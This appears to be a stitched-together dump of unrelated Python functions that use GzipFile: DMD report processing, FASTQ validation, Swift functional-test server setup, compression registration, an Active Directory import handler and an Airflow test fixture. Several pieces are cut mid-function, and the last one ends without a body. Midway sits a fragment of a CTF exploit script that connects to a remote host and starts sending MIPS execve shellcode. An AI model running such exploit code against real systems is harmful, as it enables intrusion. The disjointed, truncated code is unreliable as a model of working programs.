def __enter__(self):
    """Begin a gzip-compressed write session backed by a fresh buffer.

    A new buffer is stored on ``self._buffer`` and a ``GzipFile`` opened in
    ``"wb"`` mode on top of it is stored on ``self._writer``.

    Returns:
        The ``GzipFile`` writer, which is what ``with ... as`` binds.
    """
    self._buffer = StringIO()
    gzip_writer = GzipFile(fileobj=self._buffer, mode="wb")
    self._writer = gzip_writer
    return gzip_writer
def process_dmd_files_impl(dmd_files, args):
    """Rewrite raw DMD dumps as annotated gzip reports with fixed stacks.

    For every path in ``dmd_files`` a new gzip file is written next to the
    first input file. It starts with a comment header (creation time,
    processing time, owning app/pid, and the full ``b2g-procrank`` listing)
    followed by whatever ``fix_b2g_stack.fix_b2g_stacks_in_file`` emits for
    the original dump.

    Args:
        dmd_files: Paths of the DMD dump files. ``b2g-procrank`` is read from
            the directory of the first entry. An empty sequence is a no-op.
        args: Options object; ``keep_individual_reports`` is read here and
            the object is forwarded to ``fix_b2g_stacks_in_file``.
    """
    if not dmd_files:
        return

    out_dir = os.path.dirname(dmd_files[0])

    with open(os.path.join(out_dir, 'b2g-procrank'), 'r') as procrank_file:
        procrank = procrank_file.read().split('\n')

    proc_names = {}
    for line in procrank:
        # App names may contain spaces and special characters (e.g.
        # '(Preallocated app)').  But for our purposes here, it's easier to
        # look at only the first word, and to strip off any special characters.
        #
        # We also assume that if an app name contains numbers, it contains them
        # only in the first word.
        match = re.match(r'^(\S+)\s+\D*(\d+)', line)
        if not match:
            continue
        proc_names[int(match.group(2))] = re.sub(r'\W', '', match.group(1)).lower()

    for f in dmd_files:
        # Extract the PID (e.g. 111) and UNIX time (e.g. 9999999) from the name
        # of the dmd file (e.g. dmd-9999999-111.txt.gz).
        basename = os.path.basename(f)
        dmd_filename_match = re.match(r'^dmd-(\d+)-(\d+).', basename)

        # Reset per file so an unrecognised name never inherits values from
        # the previous iteration (or hits an unbound ``proc_name``).
        pid = None
        creation_time = None
        proc_name = None
        if dmd_filename_match:
            creation_time = datetime.fromtimestamp(int(dmd_filename_match.group(1)))
            pid = int(dmd_filename_match.group(2))
            if pid in proc_names:
                proc_name = proc_names[pid]
                outfile_name = 'dmd-%s-%d.txt.gz' % (proc_name, pid)
            else:
                outfile_name = 'dmd-%d.txt.gz' % pid
        else:
            outfile_name = 'processed-' + basename

        # The context manager guarantees the gzip trailer is flushed even if
        # stack fixing raises; GzipFile.close() is safe to call twice.
        with GzipFile(os.path.join(out_dir, outfile_name), 'w') as outfile:
            def write(text):
                print(text, file=outfile)

            write('# Processed DMD output')
            if creation_time:
                write('# Created on %s, device time (may be unreliable).' %
                      creation_time.strftime('%c'))
            write('# Processed on %s, host machine time.' %
                  datetime.now().strftime('%c'))
            if proc_name:
                write('# Corresponds to "%s" app, pid %d' % (proc_name, pid))
            elif pid is not None:
                write('# Corresponds to unknown app, pid %d' % pid)
            else:
                write('# Corresponds to unknown app, unknown pid.')

            write('#\n# Contents of b2g-procrank:\n#')
            for line in procrank:
                write('#    ' + line.strip())
            write('\n')

            with GzipFile(f, 'r') as infile:
                fix_b2g_stack.fix_b2g_stacks_in_file(infile, outfile, args)

        # Only delete the raw dump once both handles are closed.
        if not args.keep_individual_reports:
            os.remove(f)
def encode(self):
    """Return the parent class's encoded payload, gzip-compressed.

    The result of ``super().encode()`` is written through a ``GzipFile``
    into an in-memory buffer, and the buffer's contents are returned.
    """
    payload = super(CompressedAsset, self).encode()
    sink = BytesIO()
    compressor = GzipFile(fileobj=sink, mode='wb')
    try:
        compressor.write(payload)
    finally:
        # Closing writes the gzip trailer into ``sink``.
        compressor.close()
    return sink.getvalue()
def is_fastq(fastq_file, verbose):
    """Sanity-check the head of a FASTQ file and return its mean read length.

    Up to the first 10000 lines are read (transparently through gzip or
    bzip2 when the name ends in ``.gz`` / ``.bz2``) and checked record by
    record: line 1 must start with ``@``, line 3 with ``+``, and lines 2 and
    4 must have the same length.

    Args:
        fastq_file: Path of the file to inspect.
        verbose: Verbosity level; at ``>= 2`` a warning is written to stderr
            when every inspected read has the same length.

    Returns:
        The average length of the sequence lines, truncated to ``int``.
        Lengths are taken from the raw lines as read, so a trailing line
        terminator is counted.
        NOTE(review): confirm callers expect the terminator to be included.

    Exits:
        Calls ``sys.exit(1)`` after writing a message to stderr when the file
        is missing, unreadable, shorter than four lines, or contains no
        complete valid record.
    """
    n_lines_head = 10000

    if not os.path.isfile(fastq_file):
        sys.stderr.write("[E::main] Error: " + fastq_file + ': No such file.\n')
        sys.exit(1)

    zippedInput = fastq_file.endswith((".gz", ".bz2"))
    try:
        if fastq_file.endswith(".gz"):
            with GzipFile(fastq_file) as filef:
                head = list(islice(filef, n_lines_head))
        elif fastq_file.endswith(".bz2"):
            with BZ2File(fastq_file) as filef:
                head = list(islice(filef, n_lines_head))
        else:
            with open(fastq_file) as filef:
                head = list(islice(filef, n_lines_head))
    except Exception:
        # ``Exception`` rather than a bare ``except`` so that SystemExit and
        # KeyboardInterrupt are never swallowed, and so a plain-text failure
        # reports exactly one error instead of cascading into the
        # compressed-file message as well.
        if zippedInput:
            sys.stderr.write("[E::main] Error. Cannot load the file " +
                             fastq_file + "\n")
            sys.stderr.write(
                "[E::main] Supported file are zipped .gz or .bz2, or plain text\n")
        else:
            sys.stderr.write("[E::main] Error loading file: " + fastq_file + "\n")
        sys.exit(1)

    # check min length of fastq file:
    if len(head) < 4:
        sys.stderr.write("[E::main] Error: file " + fastq_file +
                         " is not a fastq file\n")
        sys.exit(1)

    # go through the lines in head
    all_lengths = list()
    cont_line = 1  # position inside the current 4-line record (1..4)
    for cont, line in enumerate(head, 1):
        if zippedInput:
            # Compressed readers yield bytes.
            line = line.decode('ascii')

        if cont_line == 1:
            if line[0] != "@":
                print_error_fasta("Line does not start with @", cont, fastq_file)
        if cont_line == 2:
            l1 = len(line)
        if cont_line == 3:
            if line[0] != "+":
                print_error_fasta("Line does not start with +", cont, fastq_file)
        if cont_line == 4:
            l2 = len(line)
            if l1 != l2:
                print_error_fasta(
                    "Length of quality line is different from length of the read",
                    cont, fastq_file)
            else:
                all_lengths.append(l1)

        if cont_line != 4:
            cont_line = cont_line + 1
        else:
            cont_line = 1

    if len(all_lengths) < 1:
        sys.stderr.write("[E::main] Error: file " + fastq_file +
                         " is not a fastq file\n")
        sys.exit(1)

    # Identical lengths across all reads suggest no quality trimming was done.
    if all(x == all_lengths[0] for x in all_lengths) and len(all_lengths) > 1:
        if verbose >= 2:
            sys.stderr.write(
                "[W::main] Warning: file " + fastq_file +
                ". The length of the first " + str(len(all_lengths)) +
                " reads is " + str(all_lengths[0]) +
                ". It is suggested to quality control the reads before profiling\n")

    avg_length = sum(all_lengths) / float(len(all_lengths))
    return int(avg_length)
def in_process_setup(the_object_server=object_server):
    """Start a complete set of Swift servers inside the test process.

    Locates the proxy and swift config files, creates a temporary device
    tree, optionally runs a config loader selected through
    ``SWIFT_TEST_IN_PROCESS_CONF_LOADER``, writes account and container rings,
    and spawns proxy, account, container and object WSGI servers with
    ``eventlet.spawn``. Finally the ``AUTH_test`` and ``AUTH_test2`` accounts
    are created.

    Module globals written: ``_testdir``, ``config``, ``_test_socks``,
    ``proxy_srv`` and ``_test_coros``.

    :param the_object_server: module whose ``ObjectController`` class is
        instantiated for each object server socket.
    :raises InProcessException: if the config source dir is not a directory,
        the requested conf loader is unknown or fails, or the proxy app
        cannot be loaded.
    :raises SkipTest: if the swift constraints were not loaded.
    """
    _info('IN-PROCESS SERVERS IN USE FOR FUNCTIONAL TESTS')
    _info('Using object_server class: %s' % the_object_server.__name__)
    conf_src_dir = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_DIR')
    show_debug_logs = os.environ.get('SWIFT_TEST_DEBUG_LOGS')

    if conf_src_dir is not None:
        if not os.path.isdir(conf_src_dir):
            msg = 'Config source %s is not a dir' % conf_src_dir
            raise InProcessException(msg)
        _info('Using config source dir: %s' % conf_src_dir)

    # If SWIFT_TEST_IN_PROCESS_CONF specifies a config source dir then
    # prefer config files from there, otherwise read config from source tree
    # sample files. A mixture of files from the two sources is allowed.
    proxy_conf = _in_process_find_conf_file(conf_src_dir, 'proxy-server.conf')
    _info('Using proxy config from %s' % proxy_conf)
    swift_conf_src = _in_process_find_conf_file(conf_src_dir, 'swift.conf')
    _info('Using swift config from %s' % swift_conf_src)

    monkey_patch_mimetools()

    # Build the temporary device tree. The directory is created and removed
    # once before the per-device directories are made, so the tree starts
    # out empty.
    global _testdir
    _testdir = os.path.join(mkdtemp(), 'tmp_functional')
    utils.mkdirs(_testdir)
    rmtree(_testdir)
    utils.mkdirs(os.path.join(_testdir, 'sda1'))
    utils.mkdirs(os.path.join(_testdir, 'sda1', 'tmp'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1', 'tmp'))
    utils.mkdirs(os.path.join(_testdir, 'sdc1'))
    utils.mkdirs(os.path.join(_testdir, 'sdc1', 'tmp'))

    swift_conf = _in_process_setup_swift_conf(swift_conf_src, _testdir)
    _info('prepared swift.conf: %s' % swift_conf)

    # Call the associated method for the value of
    # 'SWIFT_TEST_IN_PROCESS_CONF_LOADER', if one exists
    conf_loader_label = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_LOADER')
    if conf_loader_label is not None:
        try:
            conf_loader = conf_loaders[conf_loader_label]
            _debug('Calling method %s mapped to conf loader %s' %
                   (conf_loader.__name__, conf_loader_label))
        except KeyError as missing_key:
            raise InProcessException('No function mapped for conf loader %s' %
                                     missing_key)

        try:
            # Pass-in proxy_conf, swift_conf files
            proxy_conf, swift_conf = conf_loader(proxy_conf, swift_conf)
            _debug('Now using proxy conf %s' % proxy_conf)
            _debug('Now using swift conf %s' % swift_conf)
        except Exception as err:  # noqa
            raise InProcessException(err)

    obj_sockets = _in_process_setup_ring(swift_conf, conf_src_dir, _testdir)

    # load new swift.conf file
    if set_swift_dir(os.path.dirname(swift_conf)):
        constraints.reload_constraints()
        storage_policy.reload_storage_policies()

    global config
    config['__file__'] = 'in_process_setup()'
    if constraints.SWIFT_CONSTRAINTS_LOADED:
        # Use the swift constraints that are loaded for the test framework
        # configuration
        _c = dict(
            (k, str(v)) for k, v in constraints.EFFECTIVE_CONSTRAINTS.items())
        config.update(_c)
    else:
        # In-process swift constraints were not loaded, somethings wrong
        raise SkipTest

    global _test_socks
    _test_socks = []
    # We create the proxy server listening socket to get its port number so
    # that we can add it as the "auth_port" value for the functional test
    # clients.
    prolis = listen_zero()
    _test_socks.append(prolis)

    # The following set of configuration values is used both for the
    # functional test frame work and for the various proxy, account, container
    # and object servers.
    config.update({
        # Values needed by the various in-process swift servers
        'devices': _testdir,
        'swift_dir': _testdir,
        'mount_check': 'false',
        'client_timeout': '4',
        'allow_account_management': 'true',
        'account_autocreate': 'true',
        'allow_versions': 'True',
        'allow_versioned_writes': 'True',
        # TODO: move this into s3api config loader because they are
        #       required by only s3api
        'allowed_headers':
            "Content-Disposition, Content-Encoding, X-Delete-At, "
            "X-Object-Manifest, X-Static-Large-Object, Cache-Control, "
            "Content-Language, Expires, X-Robots-Tag",
        # Below are values used by the functional test framework, as well as
        # by the various in-process swift servers
        'auth_host': '127.0.0.1',
        'auth_port': str(prolis.getsockname()[1]),
        'auth_ssl': 'no',
        'auth_prefix': '/auth/',
        # Primary functional test account (needs admin access to the
        # account)
        'account': 'test',
        'username': '******',
        'password': '******',
        's3_access_key': 'test:tester',
        's3_secret_key': 'testing',
        # Secondary user of the primary test account (needs admin access
        # to the account) for s3api
        's3_access_key2': 'test:tester2',
        's3_secret_key2': 'testing2',
        # User on a second account (needs admin access to the account)
        'account2': 'test2',
        'username2': 'tester2',
        'password2': 'testing2',
        # User on same account as first, but without admin access
        'username3': 'tester3',
        'password3': 'testing3',
        's3_access_key3': 'test:tester3',
        's3_secret_key3': 'testing3',
        # Service user and prefix (emulates glance, cinder, etc. user)
        'account5': 'test5',
        'username5': 'tester5',
        'password5': 'testing5',
        'service_prefix': 'SERVICE',
        # For tempauth middleware. Update reseller_prefix
        'reseller_prefix': 'AUTH, SERVICE',
        'SERVICE_require_group': 'service',
        # Reseller admin user (needs reseller_admin_role)
        'account6': 'test6',
        'username6': 'tester6',
        'password6': 'testing6'
    })

    # Listening sockets for two account and two container servers; their
    # port numbers are written into the rings below.
    acc1lis = listen_zero()
    acc2lis = listen_zero()
    con1lis = listen_zero()
    con2lis = listen_zero()
    _test_socks += [acc1lis, acc2lis, con1lis, con2lis] + obj_sockets

    # Account ring: two devices (sda1, sdb1) pickled into a gzip file.
    account_ring_path = os.path.join(_testdir, 'account.ring.gz')
    with closing(GzipFile(account_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]], [{
                'id': 0,
                'zone': 0,
                'device': 'sda1',
                'ip': '127.0.0.1',
                'port': acc1lis.getsockname()[1]
            }, {
                'id': 1,
                'zone': 1,
                'device': 'sdb1',
                'ip': '127.0.0.1',
                'port': acc2lis.getsockname()[1]
            }], 30), f)

    # Container ring: same layout, pointing at the container sockets.
    container_ring_path = os.path.join(_testdir, 'container.ring.gz')
    with closing(GzipFile(container_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]], [{
                'id': 0,
                'zone': 0,
                'device': 'sda1',
                'ip': '127.0.0.1',
                'port': con1lis.getsockname()[1]
            }, {
                'id': 1,
                'zone': 1,
                'device': 'sdb1',
                'ip': '127.0.0.1',
                'port': con2lis.getsockname()[1]
            }], 30), f)

    # Default to only 4 seconds for in-process functional test runs
    eventlet.wsgi.WRITE_TIMEOUT = 4

    def get_logger_name(name):
        # A debug logger is only handed out when SWIFT_TEST_DEBUG_LOGS is
        # set; otherwise the controllers receive ``logger=None``.
        if show_debug_logs:
            return debug_logger(name)
        else:
            return None

    acc1srv = account_server.AccountController(config,
                                               logger=get_logger_name('acct1'))
    acc2srv = account_server.AccountController(config,
                                               logger=get_logger_name('acct2'))
    con1srv = container_server.ContainerController(
        config, logger=get_logger_name('cont1'))
    con2srv = container_server.ContainerController(
        config, logger=get_logger_name('cont2'))

    # One (socket, controller) pair per object server socket.
    objsrvs = [(obj_sockets[index],
                the_object_server.ObjectController(config,
                                                   logger=get_logger_name(
                                                       'obj%d' % (index + 1))))
               for index in range(len(obj_sockets))]

    if show_debug_logs:
        logger = get_logger_name('proxy')
    else:
        logger = utils.get_logger(config, 'wsgi-server', log_route='wsgi')

    def get_logger(name, *args, **kwargs):
        # Stand-in for swift.common.utils.get_logger while the proxy app is
        # loaded: every caller receives the single ``logger`` chosen above.
        return logger

    with mock.patch('swift.common.utils.get_logger', get_logger):
        with mock.patch('swift.common.middleware.memcache.MemcacheMiddleware',
                        FakeMemcacheMiddleware):
            try:
                app = loadapp(proxy_conf, global_conf=config)
            except Exception as e:
                raise InProcessException(e)

    nl = utils.NullLogger()
    global proxy_srv
    proxy_srv = prolis
    prospa = eventlet.spawn(eventlet.wsgi.server,
                            prolis,
                            app,
                            nl,
                            protocol=SwiftHttpProtocol)
    acc1spa = eventlet.spawn(eventlet.wsgi.server,
                             acc1lis,
                             acc1srv,
                             nl,
                             protocol=SwiftHttpProtocol)
    acc2spa = eventlet.spawn(eventlet.wsgi.server,
                             acc2lis,
                             acc2srv,
                             nl,
                             protocol=SwiftHttpProtocol)
    con1spa = eventlet.spawn(eventlet.wsgi.server,
                             con1lis,
                             con1srv,
                             nl,
                             protocol=SwiftHttpProtocol)
    con2spa = eventlet.spawn(eventlet.wsgi.server,
                             con2lis,
                             con2srv,
                             nl,
                             protocol=SwiftHttpProtocol)

    objspa = [
        eventlet.spawn(eventlet.wsgi.server,
                       objsrv[0],
                       objsrv[1],
                       nl,
                       protocol=SwiftHttpProtocol) for objsrv in objsrvs
    ]

    global _test_coros
    _test_coros = \
        (prospa, acc1spa, acc2spa, con1spa, con2spa) + tuple(objspa)

    # Create accounts "test" and "test2"
    def create_account(act):
        # PUT the account on every node the account ring returns for it and
        # require a 201 from each.
        ts = utils.normalize_timestamp(time())
        account_ring = Ring(_testdir, ring_name='account')
        partition, nodes = account_ring.get_nodes(act)
        for node in nodes:
            # Note: we are just using the http_connect method in the object
            # controller here to talk to the account server nodes.
            conn = swift.proxy.controllers.obj.http_connect(
                node['ip'], node['port'], node['device'], partition, 'PUT',
                '/' + act, {
                    'X-Timestamp': ts,
                    'x-trans-id': act
                })
            resp = conn.getresponse()
            assert resp.status == 201, 'Unable to create account: %s\n%s' % (
                resp.status, resp.body)

    create_account('AUTH_test')
    create_account('AUTH_test2')
# gzipout.py
# Compress everything read from stdin and write the gzip stream to stdout.
import sys
from gzip import GzipFile
from StringIO import StringIO

sio = StringIO()
gzf = GzipFile(fileobj=sio, mode='wb')
gzf.write(sys.stdin.read())
# close() writes the gzip trailer into the buffer.
gzf.close()
# Output gzipped stream.
sys.stdout.write(sio.getvalue())

# To try it out from a shell:
# $ cat textfile | python gzipout.py | zcat

# A socket object used for network programming cannot seek(), so data
# coming from one is first copied into a StringIO before being handed to
# GzipFile.

# gzipin.py
# Decompress 'gzipped.gz' and print its contents.
from gzip import GzipFile
from StringIO import StringIO

# StringIO must wrap the file's bytes, not the file object itself.
with open('gzipped.gz', 'rb') as gzstream:
    sio = StringIO(gzstream.read())
gz = GzipFile(fileobj=sio, mode='rb')
print(gz.read())
def unzip(infile, mode="rb", filename=None, **kwargs):
    """Open one member of a zip archive as a file-like object.

    Args:
        infile: Path or file-like object handed to ``ZipFile``.
        mode: When it contains ``"r"`` the archive is read; otherwise a new
            archive is written.
        filename: Member name. When reading it defaults to the first entry
            in the archive; when writing it defaults to ``"file"``.
        **kwargs: Forwarded to ``ZipFile`` when writing and to
            ``ZipFile.open`` when reading.

    Returns:
        The file object returned by ``ZipFile.open``. In write mode its
        ``close`` is replaced so that the archive is closed with it.
    """
    if "r" not in mode:
        filename = filename or "file"
        z = ZipFile(infile, mode="w", **kwargs)
        fo = z.open(filename, mode="w")
        # The caller only ever sees the member handle, so closing it must
        # also close the archive.
        fo.close = lambda closer=fo.close: closer() or z.close()
        return fo
    z = ZipFile(infile)
    if filename is None:
        filename = z.namelist()[0]
    return z.open(filename, mode="r", **kwargs)


register_compression("zip", unzip, "zip")
register_compression("bz2", BZ2File, "bz2")
register_compression("gzip", lambda f, **kwargs: GzipFile(fileobj=f, **kwargs), "gz")

# lzma support is optional: register it only when the module is importable.
try:
    import lzma

    register_compression("lzma", lzma.LZMAFile, "xz")
    register_compression("xz", lzma.LZMAFile, "xz", force=True)
except ImportError:
    pass

# When lzmaffi is installed it replaces the registrations made above
# (force=True).
try:
    import lzmaffi

    register_compression("lzma", lzmaffi.LZMAFile, "xz", force=True)
    register_compression("xz", lzmaffi.LZMAFile, "xz", force=True)
except ImportError:
    pass
def load_gaf_entries(local=True):
    """Yield the tab-separated rows of a gzip-compressed GAF file.

    The stream returned by ``open_gaf(local=local)`` is gunzipped, lines
    starting with ``!`` are dropped, the rest are decoded as UTF-8 and parsed
    with ``csv.reader`` using a tab delimiter.

    Yields:
        One list of string fields per remaining line.
    """
    with open_gaf(local=local) as raw_stream, \
            GzipFile(fileobj=raw_stream) as gz_stream:
        data_lines = filter(lambda raw: not raw.startswith(b'!'), gz_stream)
        text_lines = map(lambda raw: raw.decode('utf-8'), data_lines)
        for record in csv.reader(text_lines, delimiter='\t'):
            yield record
def getDecompressedBase64Lic(lic):
    """Base64-decode ``lic`` and return the gunzipped content."""
    compressed = b64decode(lic)
    stream = cStringIO.StringIO(compressed)
    gz_reader = GzipFile(fileobj=stream)
    return gz_reader.read()
def post(self):
    """Import an Active Directory export uploaded as gzip-compressed XML.

    The posted ``media`` file is gunzipped and parsed, every AD object named
    in ``self.importSchema`` is converted to a MongoDB object and saved with
    its tree path, group membership is rebuilt, a Chef node and client are
    prepared for each computer, and policies are applied to the objects
    collected in ``objects_apply_policy``.

    Returns a dict with ``status`` and ``ok`` keys, plus ``warnings`` when
    the report contains any. Any exception is logged and reported through
    ``ok: False`` instead of propagating.

    NOTE(review): block nesting was reconstructed from the statement order;
    confirm the spots marked below.
    """
    try:
        # Initialize report
        report = {'inserted': 0, 'updated': 0, 'total': 0, 'warnings': {}}

        objects_apply_policy = {'computer': [], 'user': []}

        db = self.request.db

        # Read GZIP data
        postedfile = self.request.POST['media'].file
        xmldata = GzipFile('', 'r', 9, StringIO(postedfile.read())).read()

        # Read XML data
        xmldoc = minidom.parseString(xmldata)

        # Get the root domain
        xmlDomain = xmldoc.getElementsByTagName('Domain')[0]
        is_ad_master = self.request.POST['master'] == 'True'
        domain = self._get_domain(self.importSchema[0], xmlDomain,
                                  is_ad_master, report)

        # Convert from AD objects to MongoDB objects
        mongoObjects = {}      # objects to save, keyed by distinguished name
        mongoObjectsPath = {}  # every converted object, used to find parents
        for objSchema in self.importSchema:
            objs = xmldoc.getElementsByTagName(objSchema['adName'])
            for adObj in objs:
                if not adObj.hasAttribute('ObjectGUID'):
                    raise Exception(
                        'An Active Directory object must has "ObjectGUID" attrib.'
                    )
                mongoObject, is_saving = self._convertADObjectToMongoObject(
                    domain, mongoObjects, objSchema, adObj, is_ad_master,
                    report, objects_apply_policy)
                report['total'] += 1
                if is_saving:
                    mongoObjects[
                        mongoObject['adDistinguishedName']] = mongoObject
                # NOTE(review): assumed to run for every object, not only
                # when is_saving is true - confirm.
                mongoObjectsPath[
                    mongoObject['adDistinguishedName']] = mongoObject

        # Order mongoObjects by dependences
        if mongoObjects:
            mongoObjects[domain['adDistinguishedName']] = domain
            mongoObjectsPath[domain['adDistinguishedName']] = domain
            mongoObjects = self._orderByDependencesMongoObjects(
                mongoObjects, domain)

        # Save each MongoDB objects
        properRootDomainADDN = domain['adDistinguishedName']
        for index, mongoObject in mongoObjects.items():
            # The root domain itself has no parent to resolve.
            if index == properRootDomainADDN:
                continue
            # Get the proper path ("root,{0}._id,{1}._id,{2}._id...")
            listPath = re.findall(ur'([^, ]+=(?:(?:\\,)|[^,])+)', index)
            # Dropping the first component leaves the parent's name.
            nodePath = ','.join(listPath[1:])

            # Find parent
            mongoObjectParent = mongoObjectsPath[nodePath]
            mongoObjectParent = self.collection.find_one(
                {'_id': mongoObjectParent['_id']})
            path = '{0},{1}'.format(mongoObjectParent['path'],
                                    str(mongoObjectParent['_id']))
            mongoObject['path'] = path
            # Save mongoObject
            self._saveMongoObject(mongoObject)

        # AD Fixes
        admin_user = self.request.user
        chef_server_api = get_chef_api(get_current_registry().settings,
                                       admin_user)
        if is_ad_master:
            # When AD is the master, existing group member lists are emptied
            # before membership is rebuilt below.
            for index, mongoObject in mongoObjects.items():
                if mongoObject['type'] == 'group':
                    if mongoObject['members'] != []:
                        mongoObject['members'] = []
                        self._saveMongoObject(mongoObject)

        for index, mongoObject in mongoObjects.items():
            updateMongoObject = False
            # MemberOf
            if mongoObject['type'] in ('user', 'computer'):
                if 'memberof' not in mongoObject or is_ad_master:
                    mongoObject['memberof'] = []

                if 'adPrimaryGroup' in mongoObject and mongoObject[
                        'adPrimaryGroup']:
                    group = mongoObjects[mongoObject['adPrimaryGroup']]
                    if is_visible_group(db, group['_id'], mongoObject):
                        if not mongoObject['_id'] in group['members']:
                            group['members'].append(mongoObject['_id'])
                            self._saveMongoObject(group)

                        if mongoObjects[mongoObject['adPrimaryGroup']][
                                '_id'] not in mongoObject['memberof']:
                            mongoObject['memberof'].append(mongoObjects[
                                mongoObject['adPrimaryGroup']]['_id'])
                    else:
                        self._warningGroup(group, mongoObject, report)
                    # NOTE(review): assumed to run whether or not the group
                    # is visible - confirm.
                    updateMongoObject = True
                    del mongoObject['adPrimaryGroup']

                if 'adMemberOf' in mongoObject and mongoObject[
                        'adMemberOf']:
                    for group_id in mongoObject['adMemberOf']:
                        group = mongoObjects[group_id]
                        if is_visible_group(db, group['_id'], mongoObject):
                            if not mongoObject['_id'] in group['members']:
                                group['members'].append(mongoObject['_id'])
                                self._saveMongoObject(group)

                            if mongoObjects[group_id][
                                    '_id'] not in mongoObject['memberof']:
                                mongoObject['memberof'].append(
                                    mongoObjects[group_id]['_id'])
                        else:
                            self._warningGroup(group, mongoObject, report)
                    updateMongoObject = True
                    del mongoObject['adMemberOf']

            # Create Chef-Server Nodes
            if mongoObject['type'] == 'computer':
                chef_server_node = reserve_node_or_raise(
                    mongoObject['name'],
                    chef_server_api,
                    'gcc-ad-import-%s' % random.random(),
                    attempts=3)
                ohai_gecos_in_runlist = self.RECIPE_NAME_OHAI_GECOS in chef_server_node.run_list
                gecos_ws_mgmt_in_runlist = self.RECIPE_NAME_GECOS_WS_MGMT in chef_server_node.run_list
                # Make sure both recipes are present, with the OHAI recipe
                # placed before the WS_MGMT recipe.
                if not ohai_gecos_in_runlist and not gecos_ws_mgmt_in_runlist:
                    chef_server_node.run_list.append(
                        self.RECIPE_NAME_OHAI_GECOS)
                    chef_server_node.run_list.append(
                        self.RECIPE_NAME_GECOS_WS_MGMT)
                elif not ohai_gecos_in_runlist and gecos_ws_mgmt_in_runlist:
                    chef_server_node.run_list.insert(
                        chef_server_node.run_list.index(
                            self.RECIPE_NAME_GECOS_WS_MGMT),
                        self.RECIPE_NAME_OHAI_GECOS)
                elif ohai_gecos_in_runlist and not gecos_ws_mgmt_in_runlist:
                    chef_server_node.run_list.insert(
                        chef_server_node.run_list.index(
                            self.RECIPE_NAME_OHAI_GECOS) + 1,
                        self.RECIPE_NAME_GECOS_WS_MGMT)
                save_node_and_free(chef_server_node)
                chef_server_client = Client(mongoObject['name'],
                                            api=chef_server_api)
                if not chef_server_client.exists:
                    chef_server_client.save()
                mongoObject['node_chef_id'] = mongoObject['name']
                updateMongoObject = True

            # Save changes
            if updateMongoObject:
                self._saveMongoObject(mongoObject)

        # apply policies to new objects
        for node_type, node_names in objects_apply_policy.items():
            nodes = self.collection.find({
                'name': {
                    '$in': node_names
                },
                'path': get_filter_this_domain(domain),
                'type': node_type
            })
            for node in nodes:
                # Looks up apply_policies_to_<type> among the module globals.
                apply_policies_function = globals()['apply_policies_to_%s' %
                                                    node['type']]
                apply_policies_function(self.collection,
                                        node,
                                        admin_user,
                                        api=chef_server_api)

        # Return result
        status = '{0} inserted, {1} updated of {2} objects imported successfully.'.format(
            report['inserted'], report['updated'], report['total'])
        response = {'status': status, 'ok': True}
    except Exception as e:
        logger.exception(e)
        response = {'status': u'{0}'.format(e), 'ok': False}

    # Warnings gathered before a failure are still reported.
    warnings = report.get('warnings', [])
    if warnings:
        response['warnings'] = warnings
    return response
b *0x400d40 b *0x400c8c b *0x400b5c b *0x400b30 c ''') else: io = process(['./samples/0']) else: io = remote('106.53.114.216', 9999) assert solve_pow(io) assert io.recvline() == b'Binary Dump:\n' assert io.recvline() == b'===============\n' binary_dump_gz_b64 = io.recvline().decode() binary_dump_gz = base64.b64decode(binary_dump_gz_b64) binary_dump = GzipFile(fileobj=BytesIO(binary_dump_gz)).read() if args.LOCAL: solution = bytes.fromhex( 'da1ada1abb3dbb3d7def24b6f6fbb7b64b5d1669edf7edf787295cf25999ad717fe4e6c4bbf817b0c01f90c18ffd780a46480093c134fe043f7f3f7f87f361ad' ) else: solution = emu.solve(binary_dump, 'ctf') io.send(solution) io.recvuntil(b'Name\n') io.send(b'mslc') io.recvuntil(b'Your time comes.\n> ') # https://packetstormsecurity.com/files/105611/MIPS-execve-Shellcode.html io.send(b"\xff\xff\x06\x28" b"\xff\xff\xd0\x04" b"\xff\xff\x05\x28" b"\x01\x10\xe4\x27"
def setUp(self):
    """Prepare operator kwargs and sample input files for the transfer tests.

    Stores the operator arguments on ``self`` (and collected in
    ``self.kwargs``), then creates, inside a fresh temp directory, a plain
    text file plus ``.gz``, ``.GZ`` and ``.bz2`` variants, once with a header
    row and once without. Each path is recorded through ``self._set_fn``.

    Any failure while creating the files is logged and followed by
    ``self.tearDown()``; the exception is not re-raised.
    """
    self.file_names = {}
    self.task_id = 'S3ToHiveTransferTest'
    self.s3_key = 'S32hive_test_file'
    self.field_dict = OrderedDict([('Sno', 'BIGINT'),
                                   ('Some,Text', 'STRING')])
    self.hive_table = 'S32hive_test_table'
    self.delimiter = '\t'
    self.create = True
    self.recreate = True
    self.partition = {'ds': 'STRING'}
    self.headers = True
    self.check_headers = True
    self.wildcard_match = False
    self.input_compressed = False

    # The operator kwargs mirror the attributes set above, in this order.
    kwarg_names = ('task_id', 's3_key', 'field_dict', 'hive_table',
                   'delimiter', 'create', 'recreate', 'partition', 'headers',
                   'check_headers', 'wildcard_match', 'input_compressed')
    self.kwargs = {name: getattr(self, name) for name in kwarg_names}

    try:
        header = b"Sno\tSome,Text \n"
        line1 = b"1\tAirflow Test\n"
        line2 = b"2\tS32HiveTransfer\n"
        self.tmp_dir = mkdtemp(prefix='test_tmps32hive_')

        # Compressed variants are named after the text file of the same
        # header flavour, so the text file is always written first.
        compressed_variants = (('.gz', GzipFile), ('.GZ', GzipFile),
                               ('.bz2', bz2.BZ2File))
        flavours = ((True, [header, line1, line2]), (False, [line1, line2]))

        # create sample txt, gz and bz2 with and without headers
        for has_header, rows in flavours:
            with NamedTemporaryFile(mode='wb+', dir=self.tmp_dir,
                                    delete=False) as f_txt:
                self._set_fn(f_txt.name, '.txt', has_header)
                f_txt.writelines(rows)

            for suffix, opener in compressed_variants:
                fn_compressed = self._get_fn('.txt', has_header) + suffix
                with opener(filename=fn_compressed, mode="wb") as f_compressed:
                    self._set_fn(fn_compressed, suffix, has_header)
                    f_compressed.writelines(rows)
    # Base Exception so it catches Keyboard Interrupt
    except BaseException as e:
        logging.error(e)
        self.tearDown()
def _zip_file(file_path):
    """Gzip ``file_path`` into ``<file_path>.gz`` and return the new path.

    The source file is only read; it is left in place.
    """
    target_path = file_path + '.gz'
